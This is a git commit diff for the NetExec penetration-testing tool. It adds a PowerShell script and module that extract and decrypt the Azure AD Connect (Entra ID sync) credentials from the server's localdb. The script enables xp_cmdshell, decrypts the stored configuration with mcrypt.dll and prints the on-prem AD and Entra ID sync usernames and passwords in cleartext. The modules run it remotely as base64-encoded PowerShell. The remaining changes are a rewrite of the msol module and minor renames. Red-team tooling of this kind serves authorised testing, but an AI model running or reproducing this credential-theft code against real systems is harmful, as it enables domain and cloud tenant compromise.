Merge pull request Pennyw0rth#764 from Pennyw0rth/neff-add-entra-id-sync-extractor

NeffIsBack · web-flow · commit 8f973b100093 · 2025-07-14T16:47:34.000+02:00
diff --git a/nxc/data/msol_dump/entra-sync-creds.ps1 b/nxc/data/msol_dump/entra-sync-creds.ps1
@@ -0,0 +1,82 @@
+# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
+# Modified by @NeffIsBack:
+# - Added support for Entra ID sync credentials (original source: https://github.com/Gerenios/AADInternals-Endpoints/blob/6af2054705e900b733ba76c6e65bfa6cad2328cc/AADSyncSettings.ps1#L108-L116)
+
+# Function to decrypt the encrypted configuration of the Azure AD Connect sync stuff
+function decrypter($crypted, $key_id, $instance_id, $entropy) {
+    $cmd = $client.CreateCommand()
+    $cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
+    $reader = $cmd.ExecuteReader()
+
+    $decrypted = [string]::Empty
+
+    while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
+        $decrypted += $reader.GetString(0)
+    }
+    $reader.Close()
+
+    if ($decrypted -eq [string]::Empty) {
+        Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
+        return
+    }
+
+    return $decrypted
+}
+
+# Create a connection to the localdb instance of Azure AD Connect
+$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
+
+try {
+    $client.Open()
+} catch {
+    Write-Host "[!] Could not connect to localdb, Entra ID sync probably not installed"
+    return
+}
+
+function f {
+    param ($q)
+    $c = $client.CreateCommand()
+    $c.CommandText = $q
+    $r = $c.ExecuteReader()
+    if (-not $r.Read()) {
+        Write-Host "[!] Error querying: $q"
+        return
+    }
+    $res = for ($i = 0; $i -lt $r.FieldCount; $i++) { $r.GetValue($i) }
+    $r.Close()
+    return $res
+}
+
+# Get keyset_id, instance_id, entropy
+$out = f "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
+if (-not $out) { return }
+$key_id, $instance_id, $entropy = $out
+
+# Get and decrypt on-prem AD credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
+if (-not $out) { return }
+$on_prem, $c = $out
+$pd = decrypter $c $key_id $instance_id $entropy
+
+# Get and decrypt Entra ID sync credentials
+$out = f "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
+if (-not $out) { return }
+$entra, $c = $out
+$qd = decrypter $c $key_id $instance_id $entropy
+
+
+
+# Extract the credentials from the decrypted XML configurations
+$domain = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
+$username = select-xml -Content $on_prem -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
+$pw = select-xml -Content $pd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+
+Write-Host "On-prem Domain: $($domain.Domain)"
+Write-Host "On-prem Username: $($username.Username)"
+Write-Host "On-prem Password: $($pw.Password)"
+
+# Extract the Entra ID sync credentials
+$entra_user = ([xml]$entra).MAConfig.'parameter-values'.parameter[0].'#text'
+$entra_pw = select-xml -Content $qd -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
+Write-Host "Entra ID Username: $($entra_user)"
+Write-Host "Entra ID Password: $($entra_pw.Password)"
diff --git a/nxc/data/msol_dump/msol_dump.ps1 b/nxc/data/msol_dump/msol_dump.ps1
diff --git a/nxc/modules/entra-sync-creds.py b/nxc/modules/entra-sync-creds.py
@@ -0,0 +1,50 @@
+
+from base64 import b64encode
+from nxc.helpers.powershell import get_ps_script
+
+
+class NXCModule:
+    """
+    Example:
+    -------
+    Module by @NeffIsBack
+    """
+
+    name = "entra-sync-creds"
+    description = "Extract Entra ID sync credentials from the target host"
+    supported_protocols = ["smb"]
+    opsec_safe = True
+    multiple_hosts = True
+
+    def __init__(self):
+        self.context = None
+        self.module_options = None
+
+        self.entra_id_psscript = ""
+
+        with open(get_ps_script("entra-sync-creds/entra-sync-creds.ps1")) as psFile:
+            for line in psFile:
+                if line.startswith("#") or line.strip() == "":
+                    continue
+                else:
+                    self.entra_id_psscript += line.strip() + "\n"
+
+    def options(self, context, module_options):
+        """No module options available."""
+
+    def on_admin_login(self, context, connection):
+        self.context = context
+
+        psScript_b64 = b64encode(self.entra_id_psscript.encode("UTF-16LE")).decode("utf-8")
+        out = connection.execute(f"powershell.exe -e {psScript_b64} -OutputFormat Text", True)
+
+        if "CLIXML" in out:
+            out = out.split("CLIXML")[1].split("<Objs Version")[0]
+
+        for line in out.splitlines():
+            if not line.strip():
+                continue
+            if "[!]" in line:
+                self.context.log.fail(line.replace("[!]", "").strip())
+            else:
+                self.context.log.highlight(line.strip())
diff --git a/nxc/modules/msol.py b/nxc/modules/msol.py
@@ -1,93 +1,46 @@
-# MSOL module for nxc
+# MSOL module for NetExec
 # Author of the module : https://twitter.com/Daahtk
 # Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
-from sys import exit
-from os import path
-from nxc.paths import TMP_PATH
+# Fully rewritten by @NeffIsBack
+from base64 import b64encode
 from nxc.helpers.powershell import get_ps_script
 
 
 class NXCModule:
+    """Module by @NeffIsBack"""
     name = "msol"
-    description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
+    description = "Dump MSOL cleartext password and Entra ID credentials from the localDB on the Entra ID Connect Server"
     supported_protocols = ["smb"]
     opsec_safe = True
     multiple_hosts = True
 
-    def __init__(self, context=None, module_options=None):
-        self.use_embedded = None
-        self.MSOL_PS1 = None
-        self.msol_embedded = None
-        self.cmd = None
-        self.msolmdl = None
-        self.msol = None
-        self.tmp_share = None
-        self.share = None
-        self.tmp_dir = None
-        self.context = context
-        self.module_options = module_options
+    def __init__(self):
+        self.context = None
+        self.module_options = None
 
-    def options(self, context, module_options):
-        """MSOL_PS1   // Path to the msol binary on your computer"""
-        self.tmp_dir = "C:\\Windows\\Temp\\"
-        self.share = "C$"
-        self.tmp_share = self.tmp_dir.split(":")[1]
-        self.msol = "msol.ps1"
-        self.use_embedded = True
-        self.msolmdl = self.cmd = ""
-
-        with open(get_ps_script("msol_dump/msol_dump.ps1")) as msolsc:
-            self.msol_embedded = msolsc.read()
+        self.entra_id_psscript = ""
 
-        if "MSOL_PS1" in module_options:
-            self.MSOL_PS1 = module_options["MSOL_PS1"]
-            self.use_embedded = False
+        with open(get_ps_script("msol_dump/entra-sync-creds.ps1")) as psFile:
+            for line in psFile:
+                if line.startswith("#") or line.strip() == "":
+                    continue
+                else:
+                    self.entra_id_psscript += line.strip() + "\n"
 
-    def exec_script(self, _, connection):
-        command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
-        return connection.execute(command, True)
+    def options(self, context, module_options):
+        """No module options available."""
 
     def on_admin_login(self, context, connection):
-        if self.use_embedded:
-            file_to_upload = f"{TMP_PATH}/msol.ps1"
+        psScript_b64 = b64encode(self.entra_id_psscript.encode("UTF-16LE")).decode("utf-8")
+        out = connection.execute(f"powershell.exe -e {psScript_b64} -OutputFormat Text", True)
 
-            try:
-                with open(file_to_upload, "w") as msol:
-                    msol.write(self.msol_embedded)
-            except FileNotFoundError:
-                context.log.fail(f"Impersonate file specified '{file_to_upload}' does not exist!")
-                exit(1)
-            
-        else:
-            if path.isfile(self.MSOL_PS1):
-                file_to_upload = self.MSOL_PS1
-            else:
-                context.log.fail(f"Cannot open {self.MSOL_PS1}")
-                exit(1)
+        if "CLIXML" in out:
+            out = out.split("CLIXML")[1].split("<Objs Version")[0]
 
-        context.log.display(f"Uploading {self.msol}")
-        with open(file_to_upload, "rb") as msol:
-            try:
-                connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
-                context.log.success("Msol script successfully uploaded")
-            except Exception as e:
-                context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
-                return
-        try:
-            if self.cmd == "":
-                context.log.display("Executing the script")
-                p = self.exec_script(context, connection)
-                for line in p.splitlines():
-                    p1, p2 = line.split(" ", 1)
-                    context.log.highlight(f"{p1} {p2}")
+        for line in out.splitlines():
+            if not line.strip():
+                continue
+            if "[!]" in line:
+                context.log.fail(line.replace("[!]", "").strip())
             else:
-                context.log.fail("Script Execution Impossible")
-
-        except Exception as e:
-            context.log.fail(f"Error running command: {e}")
-        finally:
-            try:
-                connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
-                context.log.success("Msol script successfully deleted")
-            except Exception as e:
-                context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
+                context.log.highlight(line.strip())
diff --git a/nxc/modules/veeam.py b/nxc/modules/veeam.py
@@ -135,18 +135,18 @@ def executePsMssql(self, connection, SqlDatabase, SqlInstance, SqlServer, salt):
         self.psScriptMssql = self.psScriptMssql.replace("REPLACE_ME_SqlInstance", SqlInstance)
         self.psScriptMssql = self.psScriptMssql.replace("REPLACE_ME_SqlServer", SqlServer)
         self.psScriptMssql = self.psScriptMssql.replace("REPLACE_ME_b64Salt", salt)
-        psScipt_b64 = b64encode(self.psScriptMssql.encode("UTF-16LE")).decode("utf-8")
+        psScript_b64 = b64encode(self.psScriptMssql.encode("UTF-16LE")).decode("utf-8")
 
-        return connection.execute(f"powershell.exe -e {psScipt_b64} -OutputFormat Text", True)
+        return connection.execute(f"powershell.exe -e {psScript_b64} -OutputFormat Text", True)
 
     def executePsPostgreSql(self, connection, PostgreSqlExec, PostgresUserForWindowsAuth, SqlDatabaseName, salt):
         self.psScriptPostgresql = self.psScriptPostgresql.replace("REPLACE_ME_PostgreSqlExec", PostgreSqlExec)
         self.psScriptPostgresql = self.psScriptPostgresql.replace("REPLACE_ME_PostgresUserForWindowsAuth", PostgresUserForWindowsAuth)
         self.psScriptPostgresql = self.psScriptPostgresql.replace("REPLACE_ME_SqlDatabaseName", SqlDatabaseName)
         self.psScriptPostgresql = self.psScriptPostgresql.replace("REPLACE_ME_b64Salt", salt)
-        psScipt_b64 = b64encode(self.psScriptPostgresql.encode("UTF-16LE")).decode("utf-8")
+        psScript_b64 = b64encode(self.psScriptPostgresql.encode("UTF-16LE")).decode("utf-8")
 
-        return connection.execute(f"powershell.exe -e {psScipt_b64} -OutputFormat Text", True)
+        return connection.execute(f"powershell.exe -e {psScript_b64} -OutputFormat Text", True)
 
     def printCreds(self, context, output):
         # Format output if returned in some XML Format
diff --git a/nxc/protocols/smb/wmiexec.py b/nxc/protocols/smb/wmiexec.py
@@ -111,7 +111,7 @@ def execute_remote(self, data):
 
         command = self.__shell + data
         if self.__retOutput:
-            command += " 1> " + f"{self.__output}" + " 2>&1"
+            command += f" 1> {self.__output} 2>&1"
 
         self.logger.debug("Executing command: " + command)
         self.__win32Process.Create(command, self.__pwd, None)
